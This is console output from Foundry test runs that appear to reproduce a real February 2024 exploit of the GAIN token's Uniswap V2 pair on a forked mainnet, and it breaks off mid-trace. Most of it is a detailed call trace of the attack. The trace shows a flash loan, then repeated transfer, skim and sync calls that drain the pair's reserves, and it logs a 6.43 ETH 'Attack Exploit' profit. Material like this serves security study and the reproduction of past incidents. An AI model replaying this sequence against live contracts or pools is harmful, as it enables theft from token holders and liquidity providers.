Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.27s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/GAIN_exp.sol:16:5:
   |
16 |     IWETH WETH = IWETH(payable(address(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/GAIN_exp.sol:44:51:
   |
44 |     function uniswapV3FlashCallback(uint256 fee0, uint256 fee1, bytes memory data) external {
   |                                                   ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/GAIN_exp.sol:44:65:
   |
44 |     function uniswapV3FlashCallback(uint256 fee0, uint256 fee1, bytes memory data) external {
   |                                                                 ^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.37s (2.41ms CPU time)

Ran 1 test for src/test/2024-02/GAIN_exp.sol:ContractTest
[PASS] testExploit() (gas: 563236)
Logs:
  Before Start: 0 ETH
  Attack Exploit: 6.432936950955627431 ETH

Traces:
  [40202] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19277619 [1.927e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(Uniswap V3: USDT: [0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b], "Uniswap V3: USDT")
    │   └─ ← [Return]
    ├─ [0] VM::label(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], "Uniswap V2: GAIN")
    │   └─ ← [Return]
    ├─ [24420] WETH::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   └─ ← [Return] true
    └─ ← [Stop]

  [661336] ContractTest::testExploit()
    ├─ [2534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] console::log("Before Start: %d ETH", 0) [staticcall]
    │   └─ ← [Stop]
    ├─ [636381] Uniswap V3: USDT::flash(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100000000000000000 [1e17], 0, 0x)
    │   ├─ [2534] WETH::balanceOf(Uniswap V3: USDT: [0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b]) [staticcall]
    │   │   └─ ← [Return] 775273133927997686533 [7.752e20]
    │   ├─ [5031] 0xdAC17F958D2ee523a2206206994597C13D831ec7::balanceOf(Uniswap V3: USDT: [0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b]) [staticcall]
    │   │   └─ ← [Return] 3033512964845 [3.033e12]
    │   ├─ [25962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100000000000000000 [1e17])
    │   │   ├─ emit Transfer(from: Uniswap V3: USDT: [0xc7bBeC68d12a0d1830360F8Ec58fA599bA1b0e9b], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 100000000000000000 [1e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   │   @ 0x2a306d7595987ab10375e6e054d7489cc80c1cf5351587e21ffbd126573f06c6: 0x00000000000000000000000000000000000000000000002a071377bc0224c305 → 0x00000000000000000000000000000000000000000000002a05b03243a49ac305
    │   │   └─ ← [Return] true
    │   ├─ [576600] ContractTest::uniswapV3FlashCallback(10000000000000 [1e13], 0, 0x)
    │   │   ├─ [8062] WETH::transfer(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], 100000000000000000 [1e17])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], value: 100000000000000000 [1e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000000016345785d8a0000 → 0
    │   │   │   │   @ 0x4189c923ed1ea821eeec632d39f0196c51a67e46267a4d1d62d7714dc4594608: 0x0000000000000000000000000000000000000000000000005a30dc251b148907 → 0x0000000000000000000000000000000000000000000000005b94219d789e8907
    │   │   │   └─ ← [Return] true
    │   │   ├─ [134087] Uniswap V2: GAIN::swap(0, 100000 [1e5], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [90862] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100000 [1e5])
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 100000 [1e5])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x17e39f6d67c768c3bb0901b7cd906a16869edcadc9cb53c40eca89c1249defbf: 0 → 0x536964654100000000000000000000000000000000000000000000000000000a
    │   │   │   │   │   @ 0x7eca8d69f46c70f4f9c16933c63ed8df9f5b0c1d07ac9972f81515e308ba23ef: 0 → 0x00000001524faf6572f7befe0376415128d1b1b3abeacfac517cdf7af4fc9ba0
    │   │   │   │   │   @ 32: 1 → 0
    │   │   │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0xa4c4dcfc5f4e690430d47373c79a3c91d1c68c882868c88cf415c71c42efdfe9 → 0xa4c4dcfb0cfeb99ebddcb475c423fb40a8f4dad47c7df8e0a298e7a14df34449
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 6598936314221857031 [6.598e18]
    │   │   │   ├─ [6868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 180049177796806821424078518 [1.8e26]
    │   │   │   ├─ emit Sync(reserve0: 6598936314221857031 [6.598e18], reserve1: 180049177796806821424078518 [1.8e26])
    │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 100000000000000000 [1e17], amount1In: 0, amount0Out: 0, amount1Out: 100000 [1e5], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x000000000000000000000005ab4ba940c17059b48e0cad3155b0387186026ddf → 0x000000000000000000000005ab4ba940c170961e7934ff3ce1ef0d05d70b9da3
    │   │   │   │   @ 8: 0x6572748b00000094eee57da14ba59e988fe10000000000005a30dc251b148907 → 0x65d6379700000094eee57c6f7fc0a65b1eb60000000000005b94219d789e8907
    │   │   │   │   @ 9: 0x00000000000000000000000437de18410c28e45334cf65af2f19dbff7919ec16 → 0x000000000000000000000004dc9b033f0da700657b89a988af9b2dfccf71519a
    │   │   │   └─ ← [Stop]
    │   │   ├─ [55185] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::transfer(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], 100)
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, value: 15)
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], value: 84)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xfa758cef5bd0db441ee78e87b9ceab03f7b5d7b78ff593b3cf8150611abcb999: 0x14ff56bcad76d008cc0f384a2d0b11e76e0d5bf340db049f440e6ee7d3aa4802 → 0x14ff56bcad78fa52d414def1b22689090688801bb654f34887ec8c6073607b91
    │   │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0xa4c4dcfb0cfeb99ebddcb475c423fb40a8f4dad47c7df8e0a298e7a14df34449 → 0xa4c4dcfb0d4779bc98342da5a2f2047645eb33571ae54be4be265f764443a36d
    │   │   │   │   @ 0x3e7a4ec3808ac56dee4175102d2849c9b4b15bc1b048f158b633acdf78f8b033: 0x000000000000d71d371619349102f8d976342dc4e3ea6dea7a8ea8d415df2583 → 0x0000000000091169bbf85f4abe04f0bf866e83f83becf8d4160de59e74c6b63c
    │   │   │   │   @ 0x7eca8d69f46c70f4f9c16933c63ed8df9f5b0c1d07ac9972f81515e308ba23ef: 0x00000001524faf6572f7befe0376415128d1b1b3abeacfac517cdf7af4fc9ba0 → 0x0000000151f913d43215b4d1372ba41155940b6150dd8539b6c844a200848c1c
    │   │   │   │   @ 0x9d437d096b5b57ac6e4ce772173e3061bda7a205c3cbfe952dcf5d9764d3ae91: 0x000000000d884eb2235196ffeba891f901a1fcde3a13a1e82c3831e632c26ca0 → 0x000000000d8bc58efcf43b3f2707b6fb8f33d052293d1fc3cc01faa7324c58b8
    │   │   │   └─ ← [Return] true
    │   │   ├─ [24153] Uniswap V2: GAIN::skim(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 6598936314221857031 [6.598e18]
    │   │   │   ├─ [3262] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 180049177796879123627905105 [1.8e26]
    │   │   │   ├─ [10630] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 72302203826587 [7.23e13])
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 72302203826587 [7.23e13])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0xa4c4dcfb0d4779bc98342da5a2f2047645eb33571ae54be4be265f764443a36d → 0x6bd12dee8c29b1b3df9836fd7b7ab03760349aaf6d602ee86af744b1b7c3abfa
    │   │   │   │   │   @ 0x7eca8d69f46c70f4f9c16933c63ed8df9f5b0c1d07ac9972f81515e308ba23ef: 0x0000000151f913d43215b4d1372ba41155940b6150dd8539b6c844a200848c1c → 0x38f3af0dd316dbdceab1ab795ea2f8503b4aa408fe62a23609f75f668d04838f
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [9920] Uniswap V2: GAIN::sync()
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 6598936314221857031 [6.598e18]
    │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 117815741151863270524560753 [1.178e26]
    │   │   │   ├─ emit Sync(reserve0: 6598936314221857031 [6.598e18], reserve1: 117815741151863270524560753 [1.178e26])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x65d6379700000094eee57c6f7fc0a65b1eb60000000000005b94219d789e8907 → 0x65d6379700000061747420203e64dedfa5710000000000005b94219d789e8907
    │   │   │   └─ ← [Stop]
    │   │   ├─ [133283] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::transfer(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], 188)
    │   │   │   ├─ [275] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::WETH() [staticcall]
    │   │   │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   │   │   ├─ [78675] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForETHSupportingFeeOnTransferTokens(10, 0, [0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, 1708537751 [1.708e9])
    │   │   │   │   ├─ [10633] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::transferFrom(0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], 10)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x3e7a4ec3808ac56dee4175102d2849c9b4b15bc1b048f158b633acdf78f8b033: 0x0000000000091169bbf85f4abe04f0bf866e83f83becf8d4160de59e74c6b63c → 0x00000000000068419be1c4aca99714392481f35666053e2f06956fbbf5ede7e2
    │   │   │   │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0x6bd12dee8c29b1b3df9836fd7b7ab03760349aaf6d602ee86af744b1b7c3abfa → 0x6bd12dee8c325adbffaed19b8fe88cbdc2212b514347e98d7a6fba94369c7a54
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [504] Uniswap V2: GAIN::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 6598936314221857031 [6.598e18], 117815741151863270524560753 [1.178e26], 1708537751 [1.708e9]
    │   │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 117815741151871877929778204 [1.178e26]
    │   │   │   │   ├─ [40671] Uniswap V2: GAIN::swap(480660 [4.806e5], 0, 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 0x)
    │   │   │   │   │   ├─ [25162] WETH::transfer(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 480660 [4.806e5])
    │   │   │   │   │   │   ├─ emit Transfer(from: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 480660 [4.806e5])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x4189c923ed1ea821eeec632d39f0196c51a67e46267a4d1d62d7714dc4594608: 0x0000000000000000000000000000000000000000000000005b94219d789e8907 → 0x0000000000000000000000000000000000000000000000005b94219d78973373
    │   │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 480660
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 6598936314221376371 [6.598e18]
    │   │   │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 117815741151871877929778204 [1.178e26]
    │   │   │   │   │   ├─ emit Sync(reserve0: 6598936314221376371 [6.598e18], reserve1: 117815741151871877929778204 [1.178e26])
    │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 8607405217451 [8.607e12], amount0Out: 480660 [4.806e5], amount1Out: 0, to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x65d6379700000061747420203e64dedfa5710000000000005b94219d789e8907 → 0x65d6379700000061747420204638f0343c1c0000000000005b94219d78973373
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] WETH::balanceOf(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D) [staticcall]
    │   │   │   │   │   └─ ← [Return] 480660 [4.806e5]
    │   │   │   │   ├─ [9223] WETH::withdraw(480660 [4.806e5])
    │   │   │   │   │   ├─ [83] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::fallback{value: 480660}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ emit Withdrawal(src: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 480660 [4.806e5])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 480660 → 0
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [55] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::fallback{value: 480660}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [0] 0x9F3ca923C65738B3F85Dc4de1b5163E178bf2E16::fallback{value: 160220}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [0] 0x7B6F62aF8641EC14Fc763b4F3fD5035D49C7DB91::fallback{value: 320440}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, value: 30)
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], value: 157)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3e7a4ec3808ac56dee4175102d2849c9b4b15bc1b048f158b633acdf78f8b033: 0x00000000000068419be1c4aca99714392481f35666053e2f06956fbbf5ede7e2 → 0x00000000000fe0192510486ff3f6f08343041a83b98f249e871400bd89a13fce
    │   │   │   │   @ 0x7eca8d69f46c70f4f9c16933c63ed8df9f5b0c1d07ac9972f81515e308ba23ef: 0x38f3af0dd316dbdceab1ab795ea2f8503b4aa408fe62a23609f75f668d04838f → 0x38f3af0dd2740950f5d583dd782b2cd83d84d1c015c486e3b3eb83f7a2b228f3
    │   │   │   │   @ 0x9d437d096b5b57ac6e4ce772173e3061bda7a205c3cbfe952dcf5d9764d3ae91: 0x000000000d8bc58efcf43b3f2707b6fb8f33d052293d1fc3cc01faa7324c58b8 → 0x000000000d9248dc44303cd4bf9bddd766273f21e09f9bbcd9b0888ce9c047d8
    │   │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0x6bd12dee8c325adbffaed19b8fe88cbdc2212b514347e98d7a6fba94369c7a54 → 0x6bd12dee8cbb2032d79af2e1140fbcc66419425b4e5c14fb99c15e6c431f1870
    │   │   │   │   @ 0xfa758cef5bd0db441ee78e87b9ceab03f7b5d7b78ff593b3cf8150611abcb999: 0x14ff56bcad78fa52d414def1b22689090688801bb654f34887ec8c6073607b91 → 0x14ff56bcad7d0c63209a5fef318321526ce0a55d88f280c43079a5100608f105
    │   │   │   └─ ← [Return] true
    │   │   ├─ [24153] Uniswap V2: GAIN::skim(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 6598936314221376371 [6.598e18]
    │   │   │   ├─ [3262] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 117815741152007806072972188 [1.178e26]
    │   │   │   ├─ [10630] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 135928143193984 [1.359e14])
    │   │   │   │   ├─ emit Transfer(from: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 135928143193984 [1.359e14])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0x6bd12dee8cbb2032d79af2e1140fbcc66419425b4e5c14fb99c15e6c431f1870 → 0x00bf5fb8524f8e4279147c9dfe36da526c5856587064f1ece93b9374e16eb4f0
    │   │   │   │   │   @ 0x7eca8d69f46c70f4f9c16933c63ed8df9f5b0c1d07ac9972f81515e308ba23ef: 0x38f3af0dd2740950f5d583dd782b2cd83d84d1c015c486e3b3eb83f7a2b228f3 → 0xa4057d440cdf9b41545bfa208e040f4c3545bdc2f3bba9f264714eef04628c73
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [9920] Uniswap V2: GAIN::sync()
    │   │   │   ├─ [534] WETH::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 6598936314221376371 [6.598e18]
    │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   └─ ← [Return] 816880259377623512855239 [8.168e23]
    │   │   │   ├─ emit Sync(reserve0: 6598936314221376371 [6.598e18], reserve1: 816880259377623512855239 [8.168e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x65d6379700000061747420204638f0343c1c0000000000005b94219d78973373 → 0x65d6379700000000acfb2ae76ed80deb32c70000000000005b94219d78973373
    │   │   │   └─ ← [Stop]
    │   │   ├─ [113783] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::transfer(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], 130000000000000 [1.3e14])
    │   │   │   ├─ [275] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::WETH() [staticcall]
    │   │   │   │   └─ ← [Return] WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]
    │   │   │   ├─ [72675] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForETHSupportingFeeOnTransferTokens(18, 0, [0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, 1708537751 [1.708e9])
    │   │   │   │   ├─ [6633] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::transferFrom(0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac, Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], 18)
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcd43602a86bde6f45473b2d2e6b5d4033b3eb95f5b7235252db82979948f9d37: 0x00bf5fb8524f8e4279147c9dfe36da526c5856587064f1ece93b9374e16eb4f0 → 0x00bf5fb8525f25244c705fba896300dde9688de2249fa84938479ad95f5b5b92
    │   │   │   │   │   │   @ 0x3e7a4ec3808ac56dee4175102d2849c9b4b15bc1b048f158b633acdf78f8b033: 0x00000000000fe0192510486ff3f6f08343041a83b98f249e871400bd89a13fce → 0x000000000000493751b4655368cac9f7c5f3e2fa05546e423807f9590bb4992c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [504] Uniswap V2: GAIN::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 6598936314221376371 [6.598e18], 816880259377623512855239 [8.168e23], 1708537751 [1.708e9]
    │   │   │   │   ├─ [2868] 0xdE59b88abEFA5e6C8aA6D742EeE0f887Dab136ac::balanceOf(Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 816880259393116842246651 [8.168e23]
    │   │   │   │   ├─ [38671] Uniswap V2: GAIN::swap(124783007 [1.247e8], 0, 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 0x)
    │   │   │   │   │   ├─ [23162] WETH::transfer(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 124783007 [1.247e8])
    │   │   │   │   │   │   ├─ emit Transfer(from: Uniswap V2: GAIN: [0x31d80EA33271891986D873B397d849A92EF49255], to: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 124783007 [1.247e8])
    │   │   │   │   │   │   ├─  storage changes:
